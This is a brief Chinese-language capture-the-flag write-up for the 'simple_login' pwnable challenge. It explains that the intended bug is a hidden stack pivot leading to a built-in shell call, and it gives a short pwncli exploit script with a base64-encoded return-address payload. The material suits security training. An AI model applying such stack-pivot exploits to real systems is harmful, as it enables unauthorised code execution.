pwnable_simple_login
总结
本以为是要逆一下MD5,后来定睛一看,原来是个隐藏的栈迁移的题,还自带system("/bin/sh")。怪不得叫login,的确是签到题。也只记录下exp。
Exp
from pwncli import *
cli_script()
p:tube = gift['io']
payload = p32(0xdeadbeef) + p32(0x804925f) + p32(0x811eb40)
p.sendline(b64e(payload))
p.interactive()
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli